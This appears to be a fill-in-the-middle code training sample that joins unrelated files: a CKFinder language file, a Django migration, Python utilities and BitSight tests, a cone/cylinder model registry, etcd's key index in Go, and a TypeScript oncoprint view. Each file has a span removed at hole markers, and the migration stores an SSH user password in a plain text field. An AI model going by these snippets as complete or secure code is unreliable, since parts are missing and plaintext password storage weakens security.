thumbnailNew : 'Create new thumbnail', // MISSING
thumbnailSmall : 'Small (%s)', // MISSING
thumbnailMedium : 'Medium (%s)', // MISSING
thumbnailLarge : 'Large (%s)', // MISSING
newSize : 'Set new size', // MISSING
width : 'Width', // MISSING
height : 'Height', // MISSING
invalidHeight : 'Invalid height.', // MISSING
invalidWidth : 'Invalid width.', // MISSING
invalidName : 'Invalid file name.', // MISSING
newImage : 'Create new image', // MISSING
noExtensionChange : 'The file extension cannot be changed.', // MISSING
imageSmall : 'Source image is too small', // MISSING
contextMenuName : 'Resize' // MISSING
},
// Fileeditor plugin
Fileeditor :
{
save : 'Save', // MISSING
fileOpenError : 'Unable to open file.', // MISSING
fileSaveSuccess : 'File saved successfully.', // MISSING
contextMenuName : 'Edit', // MISSING
loadingFile : 'Loading file, please wait...' // MISSING
}
};<|fim▁end|> |
dir : 'ltr', // MISSING
HelpLang : 'en',
LangCode : 'el',
|
<|file_name|>0003_auto_20170118_1901.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-<|fim▁hole|>
from django.db import migrations, models
import django.forms.widgets
class Migration(migrations.Migration):
dependencies = [
('sshcomm', '0002_auto_20170118_1702'),
]
operations = [
migrations.AlterField(
model_name='userdata',
name='user_name',
field=models.CharField(max_length=128),
),
migrations.AlterField(
model_name='userdata',
name='user_password',
field=models.CharField(max_length=128, verbose_name=django.forms.widgets.PasswordInput),
),
]<|fim▁end|> | # Generated by Django 1.10.4 on 2017-01-18 18:01
from __future__ import unicode_literals |
<|file_name|>Utils.py<|end_file_name|><|fim▁begin|>__author__ = 'Tony Beltramelli - www.tonybeltramelli.com'
import string
import random
class Utils:
@staticmethod
def get_random_text(length_text=10, space_number=1, with_upper_case=True):
results = []
while len(results) < length_text:
char = random.choice(string.ascii_letters[:26])
results.append(char)
if with_upper_case:
results[0] = results[0].upper()
current_spaces = []
while len(current_spaces) < space_number:
space_pos = random.randint(2, length_text - 3)
if space_pos in current_spaces:
break
results[space_pos] = " "
if with_upper_case:
results[space_pos + 1] = results[space_pos - 1].upper()
current_spaces.append(space_pos)
return ''.join(results)
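# Example (illustrative): Utils.get_random_text(8, 1) yields an 8-character
# string of lowercase letters with the first character capitalized, one space
# inserted at a random position, and the character after the space upper-cased.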
<|fim▁hole|> def get_ios_id(length=10):
results = []
while len(results) < length:
char = random.choice(string.digits + string.ascii_letters)
results.append(char)
results[3] = "-"
results[6] = "-"
return ''.join(results)
@staticmethod
def get_android_id(length=10):
results = []
while len(results) < length:
char = random.choice(string.ascii_letters)
results.append(char)
return ''.join(results)<|fim▁end|> | @staticmethod |
<|file_name|>BitSightForSecurityPerformanceManagement_test.py<|end_file_name|><|fim▁begin|>import demistomock as demisto
from CommonServerPython import BaseClient
import BitSightForSecurityPerformanceManagement as bitsight
from datetime import datetime
def test_get_companies_guid_command(mocker):
# Positive Scenario
client = bitsight.Client(base_url='https://test.com')
res = {"my_company": {"guid": "123"}, "companies": [{"name": "abc", "shortname": "abc", "guid": "123"}]}
mocker.patch.object(BaseClient, '_http_request', return_value=res)
_, outputs, _ = bitsight.get_companies_guid_command(client)
assert outputs[0].get('guid') == '123'
def test_get_company_details_command(mocker):
inp_args = {'guid': '123'}
client = bitsight.Client(base_url='https://test.com')
res = {"name": "abc"}
mocker.patch.object(BaseClient, '_http_request', return_value=res)
<|fim▁hole|>
def test_get_company_findings_command(mocker):
inp_args = {'guid': '123', 'first_seen': '2021-01-01', 'last_seen': '2021-01-02'}
client = bitsight.Client(base_url='https://test.com')
res = {"results": [{"severity": "severe"}]}
mocker.patch.object(BaseClient, '_http_request', return_value=res)
_, outputs, _ = bitsight.get_company_findings_command(client, inp_args)
assert outputs[0].get('severity') == 'severe'
def test_fetch_incidents(mocker):
inp_args = {'guid': '123', 'findings_min_severity': 'severe', 'findings_grade': 'WARN',
'findings_asset_category': 'high', 'risk_vector': 'breaches,dkim'}
client = bitsight.Client(base_url='https://test.com')
mocker.patch.object(demisto, 'params', return_value=inp_args)
res = {"results": [{"severity": "severe", "first_seen": "2021-02-01", "temporary_id": "temp1"}]}
mocker.patch.object(BaseClient, '_http_request', return_value=res)
last_run, events = bitsight.fetch_incidents(client=client,
last_run={'time': '2020-12-01T01:01:01Z'},
params=inp_args)
curr_date = datetime.now().strftime('%Y-%m-%d')
assert curr_date in last_run['time']
assert events == [{'name': 'BitSight Finding - temp1', 'occurred': '2021-02-01T00:00:00Z',
'rawJSON': '{"severity": "severe", "first_seen": "2021-02-01", "temporary_id": "temp1"}'}]<|fim▁end|> | _, outputs, _ = bitsight.get_company_details_command(client, inp_args)
assert outputs.get('name') == 'abc'
|
<|file_name|>modelDB.py<|end_file_name|><|fim▁begin|>r"""
Used to configure the main parameters for each implemented model.
.. currentmodule:: compmech.conecyl.modelDB
"""
import numpy as np
from scipy.sparse import coo_matrix
from clpt import *
from fsdt import *
db = {
'clpt_donnell_bc1': {
'linear static': True,
'linear buckling': True,
'non-linear static': True,
'commons': clpt_commons_bc1,
'linear': clpt_donnell_bc1_linear,
'non-linear': clpt_donnell_bc1_nonlinear,
'dofs': 3,
'e_num': 6,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 3,
'num2': 6,
},
'clpt_donnell_bc2': {
'linear static': True,
'linear buckling': True,
'non-linear static': True,
'commons': clpt_commons_bc2,
'linear': clpt_donnell_bc2_linear,
'non-linear': clpt_donnell_bc2_nonlinear,
'dofs': 3,
'e_num': 6,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 3,
'num2': 6,
},
'iso_clpt_donnell_bc2': {
'linear static': True,
'linear buckling': True,
'non-linear static': True,
'commons': clpt_commons_bc2,
'linear': iso_clpt_donnell_bc2_linear,
'non-linear': iso_clpt_donnell_bc2_nonlinear,
'dofs': 3,
'e_num': 6,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 3,
'num2': 6,
},
'clpt_donnell_bc3': {
'linear static': True,
'linear buckling': True,
'non-linear static': True,
'commons': clpt_commons_bc3,
'linear': clpt_donnell_bc3_linear,
'non-linear': clpt_donnell_bc3_nonlinear,
'dofs': 3,
'e_num': 6,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 3,
'num2': 6,
},
'iso_clpt_donnell_bc3': {
'linear static': True,
'linear buckling': True,
'non-linear static': True,
'commons': clpt_commons_bc3,
'linear': iso_clpt_donnell_bc3_linear,
'non-linear': iso_clpt_donnell_bc3_nonlinear,
'dofs': 3,
'e_num': 6,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 3,
'num2': 6,
},
'clpt_donnell_bc4': {
'linear static': True,
'linear buckling': True,
'non-linear static': True,
'commons': clpt_commons_bc4,
'linear': clpt_donnell_bc4_linear,
'non-linear': clpt_donnell_bc4_nonlinear,
'dofs': 3,
'e_num': 6,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 3,
'num2': 6,
},
'clpt_donnell_bcn': {
'linear static': True,
'linear buckling': False,
'non-linear static': None,
'commons': clpt_commons_bcn,
'linear': clpt_donnell_bcn_linear,
'non-linear': None,
'dofs': 3,
'e_num': 6,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 3,
'num2': 8,
},
'clpt_sanders_bc1': {
'linear static': True,
'linear buckling': True,
'non-linear static': True,
'commons': clpt_commons_bc1,
'linear': clpt_sanders_bc1_linear,
'non-linear': clpt_sanders_bc1_nonlinear,
'dofs': 3,
'e_num': 6,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 3,
'num2': 6,
},
'clpt_sanders_bc2': {
'linear static': True,
'linear buckling': True,
'non-linear static': True,
'commons': clpt_commons_bc2,
'linear': clpt_sanders_bc2_linear,
'non-linear': clpt_sanders_bc2_nonlinear,
'dofs': 3,
'e_num': 6,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 3,
'num2': 6,
},
'clpt_sanders_bc3': {
'linear static': True,
'linear buckling': True,
'non-linear static': True,
'commons': clpt_commons_bc3,
'linear': clpt_sanders_bc3_linear,
'non-linear': clpt_sanders_bc3_nonlinear,
'dofs': 3,
'e_num': 6,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 3,
'num2': 6,
},
'clpt_sanders_bc4': {
'linear static': True,
'linear buckling': True,
'non-linear static': True,
'commons': clpt_commons_bc4,
'linear': clpt_sanders_bc4_linear,
'non-linear': clpt_sanders_bc4_nonlinear,
'dofs': 3,
'e_num': 6,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 3,
'num2': 6,
},
'clpt_geier1997_bc2': {
'linear static': None,
'linear buckling': True,
'non-linear static': None,
'commons': clpt_geier1997_bc2,
'linear': clpt_geier1997_bc2,
'non-linear': None,
'dofs': 3,
'e_num': 6,
'i0': 0,
'j0': 0,
'num0': 0,
'num1': 0,
'num2': 3,
},
'fsdt_donnell_bcn': {
'linear static': True,
'linear buckling': False,
'non-linear static': True,
'commons': fsdt_commons_bcn,
'linear': fsdt_donnell_bcn_linear,
'non-linear': fsdt_donnell_bcn_nonlinear,
'dofs': 5,
'e_num': 8,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 5,
'num2': 10,
},
'fsdt_donnell_bc1': {
'linear static': True,
'linear buckling': True,
'non-linear static': True,
'commons': fsdt_commons_bc1,
'linear': fsdt_donnell_bc1_linear,
'non-linear': fsdt_donnell_bc1_nonlinear,
'dofs': 5,
'e_num': 8,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 5,
'num2': 10,
},
'fsdt_donnell_bc2': {
'linear static': True,
'linear buckling': True,
'non-linear static': False,
'commons': fsdt_commons_bc2,
'linear': fsdt_donnell_bc2_linear,
'non-linear': fsdt_donnell_bc2_nonlinear,
'dofs': 5,
'e_num': 8,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 5,
'num2': 10,
},
'fsdt_donnell_bc3': {
'linear static': True,
'linear buckling': True,
'non-linear static': False,
'commons': fsdt_commons_bc3,
'linear': fsdt_donnell_bc3_linear,
'non-linear': fsdt_donnell_bc3_nonlinear,
'dofs': 5,
'e_num': 8,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 5,
'num2': 10,
},
'fsdt_donnell_bc4': {
'linear static': True,
'linear buckling': True,
'non-linear static': False,
'commons': fsdt_commons_bc4,
'linear': fsdt_donnell_bc4_linear,
'non-linear': fsdt_donnell_bc4_nonlinear,
'dofs': 5,
'e_num': 8,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 5,
'num2': 10,
},
'fsdt_sanders_bcn': {
'linear static': True,
'linear buckling': False,
'non-linear static': False,
'commons': fsdt_commons_bcn,
'linear': fsdt_sanders_bcn_linear,
'non-linear': None,
'dofs': 5,
'e_num': 8,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 5,
'num2': 10,
},
'fsdt_shadmehri2012_bc2': {
'linear static': None,
'linear buckling': True,
'non-linear static': None,
'commons': fsdt_shadmehri2012_bc2,
'linear': fsdt_shadmehri2012_bc2,
'non-linear': None,
'dofs': 5,
'e_num': 8,
'i0': 0,
'j0': 0,
'num0': 0,
'num1': 0,
'num2': 5,
},
'fsdt_shadmehri2012_bc3': {
'linear static': None,
'linear buckling': True,
'non-linear static': None,
'commons': fsdt_shadmehri2012_bc3,
'linear': fsdt_shadmehri2012_bc3,
'non-linear': None,
'dofs': 5,
'e_num': 8,
'i0': 0,
'j0': 0,
'num0': 0,
'num1': 0,
'num2': 5,
},
'fsdt_geier1997_bc2': {
'linear static': None,
'linear buckling': True,
'non-linear static': None,
'commons': fsdt_geier1997_bc2,
'linear': fsdt_geier1997_bc2,
'non-linear': None,
'dofs': 5,
'e_num': 8,
'i0': 0,
'j0': 0,
'num0': 0,
'num1': 0,
'num2': 5,
},
}
def get_linear_matrices(cc, combined_load_case=None):
r"""Obtain the right functions to calculate hte linear matrices
for a given model.
The ``model`` parameter of the ``ConeCyl`` object is used to search
for the functions ``fk0``, ``fk0_cyl``, ``fkG0``, ``fkG0_cyl``,
and the matrix ``k0edges`` is calculated, when applicable.
Parameters
----------
cc : compmech.conecyl.ConeCyl
The ``ConeCyl`` object.
combined_load_case : int, optional
As explained in the :meth:`ConeCyl.lb() <compmech.conecyl.ConeCyl.lb>`
method, the integer indicating
which combined load case should be used. Default is ``None``.
Returns
-------
out : tuple
A tuple containing ``(fk0, fk0_cyl, fkG0, fkG0_cyl, k0edges)``.
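Examples
--------
A minimal sketch (assumes ``cc`` is an already configured ``ConeCyl``
instance)::

    fk0, fk0_cyl, fkG0, fkG0_cyl, k0edges = get_linear_matrices(cc)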
"""
r1 = cc.r1
r2 = cc.r2
L = cc.L
m1 = cc.m1
m2 = cc.m2
n2 = cc.n2
model = cc.model
try:
if 'iso_' in model:
fk0edges = db[model[4:]]['linear'].fk0edges
else:
fk0edges = db[model]['linear'].fk0edges
except AttributeError:
k0edges = None
if model == 'clpt_donnell_bc1':
k0edges = fk0edges(m1, m2, n2, r1, r2, L,
cc.kphixBot, cc.kphixTop)
elif model == 'clpt_donnell_bc2':
k0edges = fk0edges(m1, m2, n2, r1, r2, L,
cc.kuBot, cc.kuTop,
cc.kphixBot, cc.kphixTop)
elif model == 'iso_clpt_donnell_bc2':
k0edges = fk0edges(m1, m2, n2, r1, r2, L,
cc.kuBot, cc.kuTop,
cc.kphixBot, cc.kphixTop)
elif model == 'clpt_donnell_bc3':
k0edges = fk0edges(m1, m2, n2, r1, r2, L,
cc.kvBot, cc.kvTop,
cc.kphixBot, cc.kphixTop)
elif model == 'iso_clpt_donnell_bc3':
k0edges = fk0edges(m1, m2, n2, r1, r2, L,
cc.kvBot, cc.kvTop,
cc.kphixBot, cc.kphixTop)
elif model == 'clpt_donnell_bc4':
k0edges = fk0edges(m1, m2, n2, r1, r2, L,
cc.kuBot, cc.kuTop,
cc.kvBot, cc.kvTop,
cc.kphixBot, cc.kphixTop)
elif model == 'clpt_donnell_bcn':
k0edges = fk0edges(m1, m2, n2, r1, r2, L,
cc.kuBot, cc.kuTop,
cc.kvBot, cc.kvTop,
cc.kwBot, cc.kwTop,
cc.kphixBot, cc.kphixTop,
cc.kphitBot, cc.kphitTop)
elif model == 'clpt_sanders_bc1':
k0edges = fk0edges(m1, m2, n2, r1, r2, L,
cc.kphixBot, cc.kphixTop)
elif model == 'clpt_sanders_bc2':
k0edges = fk0edges(m1, m2, n2, r1, r2, L,
cc.kuBot, cc.kuTop,
cc.kphixBot, cc.kphixTop)
elif model == 'clpt_sanders_bc3':
k0edges = fk0edges(m1, m2, n2, r1, r2, L,
cc.kvBot, cc.kvTop,
cc.kphixBot, cc.kphixTop)
<|fim▁hole|> cc.kphixBot, cc.kphixTop)
elif model == 'clpt_geier1997_bc2':
k0edges = fk0edges(m1, m2, n2, r1, r2, L,
cc.kuBot, cc.kuTop,
cc.kphixBot, cc.kphixTop)
elif model == 'fsdt_donnell_bc1':
k0edges = fk0edges(m1, m2, n2, r1, r2,
cc.kphixBot, cc.kphixTop)
elif model == 'fsdt_donnell_bc2':
k0edges = fk0edges(m1, m2, n2, r1, r2,
cc.kuBot, cc.kuTop,
cc.kphixBot, cc.kphixTop)
elif model == 'fsdt_donnell_bc3':
k0edges = fk0edges(m1, m2, n2, r1, r2,
cc.kvBot, cc.kvTop,
cc.kphixBot, cc.kphixTop)
elif model == 'fsdt_donnell_bc4':
k0edges = fk0edges(m1, m2, n2, r1, r2,
cc.kuBot, cc.kuTop,
cc.kvBot, cc.kvTop,
cc.kphixBot, cc.kphixTop)
elif model == 'fsdt_donnell_bcn':
k0edges = fk0edges(m1, m2, n2, r1, r2,
cc.kuBot, cc.kuTop,
cc.kvBot, cc.kvTop,
cc.kwBot, cc.kwTop,
cc.kphixBot, cc.kphixTop,
cc.kphitBot, cc.kphitTop)
elif model == 'fsdt_sanders_bcn':
k0edges = fk0edges(m1, m2, n2, r1, r2,
cc.kuBot, cc.kuTop,
cc.kvBot, cc.kvTop,
cc.kwBot, cc.kwTop,
cc.kphixBot, cc.kphixTop,
cc.kphitBot, cc.kphitTop)
elif model == 'fsdt_shadmehri2012_bc2':
k0edges = fk0edges(m1, m2, n2, r1, r2,
cc.kuBot, cc.kuTop,
cc.kphixBot, cc.kphixTop)
elif model == 'fsdt_shadmehri2012_bc3':
k0edges = fk0edges(m1, m2, n2, r1, r2,
cc.kvBot, cc.kvTop,
cc.kphixBot, cc.kphixTop)
elif model == 'fsdt_geier1997_bc2':
k0edges = fk0edges(m1, m2, n2, r1, r2,
cc.kuBot, cc.kuTop,
cc.kphixBot, cc.kphixTop)
fk0 = db[model]['linear'].fk0
fk0_cyl = db[model]['linear'].fk0_cyl
if 'iso_' in model:
fkG0 = db[model[4:]]['linear'].fkG0
fkG0_cyl = db[model[4:]]['linear'].fkG0_cyl
else:
fkG0 = db[model]['linear'].fkG0
fkG0_cyl = db[model]['linear'].fkG0_cyl
return fk0, fk0_cyl, fkG0, fkG0_cyl, k0edges
valid_models = sorted(db.keys())
def get_model(model_name):
if model_name not in valid_models:
raise ValueError('ERROR - valid models are:\n ' +
'\n '.join(valid_models))
else:
return db[model_name]<|fim▁end|> | elif model == 'clpt_sanders_bc4':
k0edges = fk0edges(m1, m2, n2, r1, r2, L,
cc.kuBot, cc.kuTop,
cc.kvBot, cc.kvTop, |
<|file_name|>key_index.go<|end_file_name|><|fim▁begin|>// Copyright 2015 CoreOS, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package storage
import (
"bytes"
"errors"
"fmt"
"log"
"github.com/coreos/etcd/Godeps/_workspace/src/github.com/google/btree"
)
var (
ErrRevisionNotFound = errors.New("storage: revision not found")
)
// keyIndex stores the revision of a key in the backend.
// Each keyIndex has at least one key generation.
// Each generation might have several key versions.
// Tombstone on a key appends a tombstone version at the end
// of the current generation and creates a new empty generation.
// Each version of a key has an index pointing to the backend.
//
// For example: put(1.0);put(2.0);tombstone(3.0);put(4.0);tombstone(5.0) on key "foo"
// generate a keyIndex:
// key: "foo"
// rev: 5
// generations:
// {empty}
// {4.0, 5.0(t)}
// {1.0, 2.0, 3.0(t)}
//
// Compacting a keyIndex removes the versions with revision smaller than or
// equal to rev except the largest one. If a generation becomes empty
// during compaction, it will be removed. If all the generations get
// removed, the keyIndex should be removed.
// For example:
// compact(2) on the previous example
// generations:
// {empty}
// {4.0, 5.0(t)}
// {2.0, 3.0(t)}
//
// compact(4)
// generations:
// {empty}
// {4.0, 5.0(t)}
//
// compact(5):
// generations:
// {empty} -> key SHOULD be removed.
//
// compact(6):
// generations:
// {empty} -> key SHOULD be removed.
type keyIndex struct {
key []byte
modified revision // the main rev of the last modification
generations []generation
}
// put puts a revision to the keyIndex.
func (ki *keyIndex) put(main int64, sub int64) {
rev := revision{main: main, sub: sub}
if !rev.GreaterThan(ki.modified) {
log.Panicf("store.keyindex: put with unexpected smaller revision [%v / %v]", rev, ki.modified)
}
if len(ki.generations) == 0 {
ki.generations = append(ki.generations, generation{})
}
g := &ki.generations[len(ki.generations)-1]
if len(g.revs) == 0 { // create a new key
keysGauge.Inc()
g.created = rev
}
g.revs = append(g.revs, rev)
g.ver++
ki.modified = rev
}
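// Example (illustrative, mirroring the keyIndex doc comment above): building
// the history of key "foo" with put and tombstone; revisions are written main.sub.
//
//	ki := &keyIndex{key: []byte("foo")}
//	ki.put(1, 0)       // generations: {1.0}
//	ki.put(2, 0)       // generations: {1.0, 2.0}
//	ki.tombstone(3, 0) // generations: {1.0, 2.0, 3.0(t)} {empty}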
func (ki *keyIndex) restore(created, modified revision, ver int64) {
if len(ki.generations) != 0 {
log.Panicf("store.keyindex: cannot restore non-empty keyIndex")
}
ki.modified = modified
g := generation{created: created, ver: ver, revs: []revision{modified}}
ki.generations = append(ki.generations, g)
keysGauge.Inc()
}
// tombstone puts a revision, pointing to a tombstone, to the keyIndex.
// It also creates a new empty generation in the keyIndex.
// It returns ErrRevisionNotFound when tombstoning an empty generation.
func (ki *keyIndex) tombstone(main int64, sub int64) error {
if ki.isEmpty() {
log.Panicf("store.keyindex: unexpected tombstone on empty keyIndex %s", string(ki.key))
}
if ki.generations[len(ki.generations)-1].isEmpty() {
return ErrRevisionNotFound
}
ki.put(main, sub)
ki.generations = append(ki.generations, generation{})
keysGauge.Dec()
return nil
}
// get gets the modified, created revision and version of the key that satisfies the given atRev.
// Rev must be higher than or equal to the given atRev.
func (ki *keyIndex) get(atRev int64) (modified, created revision, ver int64, err error) {
if ki.isEmpty() {
log.Panicf("store.keyindex: unexpected get on empty keyIndex %s", string(ki.key))
}
g := ki.findGeneration(atRev)
if g.isEmpty() {
return revision{}, revision{}, 0, ErrRevisionNotFound
}
f := func(rev revision) bool {
return rev.main > atRev
}<|fim▁hole|> return g.revs[n], g.created, g.ver - int64(len(g.revs)-n-1), nil
}
return revision{}, revision{}, 0, ErrRevisionNotFound
}
// since returns revisions since the given rev. Only the revision with the
// largest sub revision will be returned if multiple revisions have the same
// main revision.
func (ki *keyIndex) since(rev int64) []revision {
if ki.isEmpty() {
log.Panicf("store.keyindex: unexpected get on empty keyIndex %s", string(ki.key))
}
since := revision{rev, 0}
var gi int
// find the generations to start checking
for gi = len(ki.generations) - 1; gi > 0; gi-- {
g := ki.generations[gi]
if g.isEmpty() {
continue
}
if since.GreaterThan(g.created) {
break
}
}
var revs []revision
var last int64
for ; gi < len(ki.generations); gi++ {
for _, r := range ki.generations[gi].revs {
if since.GreaterThan(r) {
continue
}
if r.main == last {
// replace the revision with a new one that has higher sub value,
// because the original one should not be seen by external
revs[len(revs)-1] = r
continue
}
revs = append(revs, r)
last = r.main
}
}
return revs
}
// compact compacts a keyIndex by removing the versions with revision smaller
// than or equal to the given atRev except the largest one (if the largest one
// is a tombstone, it will not be kept).
// If a generation becomes empty during compaction, it will be removed.
func (ki *keyIndex) compact(atRev int64, available map[revision]struct{}) {
if ki.isEmpty() {
log.Panicf("store.keyindex: unexpected compact on empty keyIndex %s", string(ki.key))
}
// walk until reaching the first revision with main revision smaller than or
// equal to the given atRev,
// and add it to the available map
f := func(rev revision) bool {
if rev.main <= atRev {
available[rev] = struct{}{}
return false
}
return true
}
i, g := 0, &ki.generations[0]
// find first generation includes atRev or created after atRev
for i < len(ki.generations)-1 {
if tomb := g.revs[len(g.revs)-1].main; tomb > atRev {
break
}
i++
g = &ki.generations[i]
}
if !g.isEmpty() {
n := g.walk(f)
// remove the previous contents.
if n != -1 {
g.revs = g.revs[n:]
}
// remove any tombstone
if len(g.revs) == 1 && i != len(ki.generations)-1 {
delete(available, g.revs[0])
i++
}
}
// remove the previous generations.
ki.generations = ki.generations[i:]
return
}
func (ki *keyIndex) isEmpty() bool {
return len(ki.generations) == 1 && ki.generations[0].isEmpty()
}
// findGeneration finds the generation of the keyIndex that the
// given rev belongs to. If the given rev is at the gap of two generations,
// which means that the key does not exist at the given rev, it returns nil.
func (ki *keyIndex) findGeneration(rev int64) *generation {
lastg := len(ki.generations) - 1
cg := lastg
for cg >= 0 {
if len(ki.generations[cg].revs) == 0 {
cg--
continue
}
g := ki.generations[cg]
if cg != lastg {
if tomb := g.revs[len(g.revs)-1].main; tomb <= rev {
return nil
}
}
if g.revs[0].main <= rev {
return &ki.generations[cg]
}
cg--
}
return nil
}
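// Example (illustrative): for the "foo" keyIndex from the doc comment above,
// with generations {1.0, 2.0, 3.0(t)} and {4.0, 5.0(t)}, findGeneration(3)
// returns nil (the key was tombstoned at rev 3), while findGeneration(4)
// returns the second generation.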
func (a *keyIndex) Less(b btree.Item) bool {
return bytes.Compare(a.key, b.(*keyIndex).key) == -1
}
func (a *keyIndex) equal(b *keyIndex) bool {
if !bytes.Equal(a.key, b.key) {
return false
}
if a.modified != b.modified {
return false
}
if len(a.generations) != len(b.generations) {
return false
}
for i := range a.generations {
ag, bg := a.generations[i], b.generations[i]
if !ag.equal(bg) {
return false
}
}
return true
}
func (ki *keyIndex) String() string {
var s string
for _, g := range ki.generations {
s += g.String()
}
return s
}
// generation contains multiple revisions of a key.
type generation struct {
ver int64
created revision // when the generation is created (put in first revision).
revs []revision
}
func (g *generation) isEmpty() bool { return g == nil || len(g.revs) == 0 }
// walk walks through the revisions in the generation in descending order.
// It passes the revision to the given function.
// walk returns until: 1. it finishes walking all pairs 2. the function returns false.
// walk returns the position at where it stopped. If it stopped after
// finishing walking, -1 will be returned.
func (g *generation) walk(f func(rev revision) bool) int {
l := len(g.revs)
for i := range g.revs {
ok := f(g.revs[l-i-1])
if !ok {
return l - i - 1
}
}
return -1
}
func (g *generation) String() string {
return fmt.Sprintf("g: created[%d] ver[%d], revs %#v\n", g.created, g.ver, g.revs)
}
func (a generation) equal(b generation) bool {
if a.ver != b.ver {
return false
}
if len(a.revs) != len(b.revs) {
return false
}
for i := range a.revs {
ar, br := a.revs[i], b.revs[i]
if ar != br {
return false
}
}
return true
}<|fim▁end|> |
n := g.walk(f)
if n != -1 { |
<|file_name|>oncoprintheaderview.ts<|end_file_name|><|fim▁begin|>import OncoprintModel from "./oncoprintmodel";
import menuDotsIcon from "../img/menudots.svg";
import svgfactory from "./svgfactory";
import $ from "jquery";
import ClickEvent = JQuery.ClickEvent;
import {CLOSE_MENUS_EVENT as TRACK_OPTIONS_VIEW_CLOSE_MENUS_EVENT} from "./oncoprinttrackoptionsview";
const MENU_DOTS_SIZE = 20;
const LABEL_CLASS = "oncoprintjs__header__label";
const TOGGLE_BTN_CLASS = "oncoprintjs__header__toggle_btn_img";
const TOGGLE_BTN_OPEN_CLASS = "oncoprintjs__header__open";
const DROPDOWN_CLASS = "oncoprintjs__header__dropdown";
const SEPARATOR_CLASS = "oncoprintjs__header__separator";
const NTH_CLASS_PREFIX = "track-group-";
const FADE_MS = 100;
const HEADER_FONT_SIZE = 16;
export const CLOSE_MENUS_EVENT = "oncoprint-header-view.do-close-menus";
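// Example (illustrative): external code can close every open header menu by
// triggering the shared event on the document:
//   $(document).trigger(CLOSE_MENUS_EVENT);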
export default class OncoprintHeaderView {
private rendering_suppressed = false;
private $occluded_ctr:JQuery; // holds labels and menu buttons, which can be occluded by scrolling
private $dropdowns_ctr:JQuery;
private clickHandler:()=>void;
private $dropdowns:JQuery[] = [];
constructor($div:JQuery) {
$div.css({
position:'relative',
'pointer-events':'none'
});
const $occluding_superctr = $("<div/>").appendTo($div).css({
position:'relative',
'overflow-y':'hidden',
'overflow-x':'hidden',
width:"100%",
height:"100%"
});
this.$occluded_ctr = $("<div/>").appendTo($occluding_superctr).css({
position:'absolute',
width: "100%",
height: "100%"
});
this.$dropdowns_ctr = $("<div/>").appendTo($div).css({
position:'absolute',
width: "100%",
height: "100%"
});
this.clickHandler = ()=>{
$(document).trigger(CLOSE_MENUS_EVENT);
};
$(document).on("click", this.clickHandler);
$(document).on(CLOSE_MENUS_EVENT, ()=>{
this.closeAllDropdowns();
});
}
public destroy() {
$(document).off("click", this.clickHandler);
$(document).off(CLOSE_MENUS_EVENT);
}
private closeAllDropdowns() {
for (const $dropdown of this.$dropdowns) {
$dropdown.fadeOut(FADE_MS);
}
}
private closeDropdownsExcept($keep_open_dropdown:JQuery) {
for (const $dropdown of this.$dropdowns) {
if ($dropdown !== $keep_open_dropdown) {
$dropdown.fadeOut(FADE_MS);
}
}
$(document).trigger(TRACK_OPTIONS_VIEW_CLOSE_MENUS_EVENT);
}
private static $makeDropdownOption(text:string, weight:string, isDisabled?:()=>boolean, callback?:(evt:ClickEvent)=>void) {
const li = $('<li>').text(text).css({'font-weight': weight, 'font-size': 12, 'border-bottom': '1px solid rgba(0,0,0,0.3)'});
const disabled = isDisabled && isDisabled();
if (!disabled) {
if (callback) {
li.addClass("clickable");
li.css({'cursor': 'pointer'});
li.click(callback)
.hover(function () {
$(this).css({'background-color': 'rgb(200,200,200)'});
}, function () {
$(this).css({'background-color': 'rgba(255,255,255,0)'});
});
} else {
li.click(function(evt) { evt.stopPropagation(); });
}
} else {
li.addClass("disabled");
li.css({'color': 'rgb(200, 200, 200)', 'cursor': 'default'});
}
return li;
}
private static $makeDropdownSeparator() {
return $('<li>').css({'border-top': '1px solid black'}).addClass(SEPARATOR_CLASS);
}
public render(model:OncoprintModel) {
// clear existing elements
this.$occluded_ctr.empty();
this.$occluded_ctr.css({
top:-model.getVertScroll()
});
this.$dropdowns_ctr.empty();
this.$dropdowns_ctr.css({
top:-model.getVertScroll()
});
this.$dropdowns = [];
// add headers
const trackGroups = model.getTrackGroups();
const headerTops = model.getZoomedHeaderTops();
trackGroups.forEach((group, trackGroupIndex)=>{
if (group.header) {
const $headerDiv = $("<div/>").css({
'pointer-events':'auto'
});
// add label
$(`<span>${group.header.label.text}</span>`)
.appendTo($headerDiv)
.css({
"margin-right":10,
// TODO - custom styling
"font-weight":"bold",
"text-decoration":"underline",
"font-size":HEADER_FONT_SIZE,
"font-family":"Arial"
}).addClass(LABEL_CLASS);
if (group.header.options.length > 0) {
// add dropdown menu
const $dropdown = $('<ul>')
.appendTo(this.$dropdowns_ctr)
.css({
'position':'absolute',
'width': 120,
'display': 'none',
'list-style-type': 'none',
'padding-left': '6',
'padding-right': '6',
'float': 'right',
'background-color': 'rgb(255,255,255)',
'left':'0px',
'top': headerTops[trackGroupIndex] + MENU_DOTS_SIZE,
'pointer-events':'auto'
})
.addClass(DROPDOWN_CLASS).addClass(NTH_CLASS_PREFIX+(trackGroupIndex));
this.$dropdowns.push($dropdown);
const populateDropdownOptions = ()=>{
// repopulate dropdown every time it opens, and every time an option is clicked,
// in order to update dynamic disabled status and weight
$dropdown.empty();
// add dropdown options
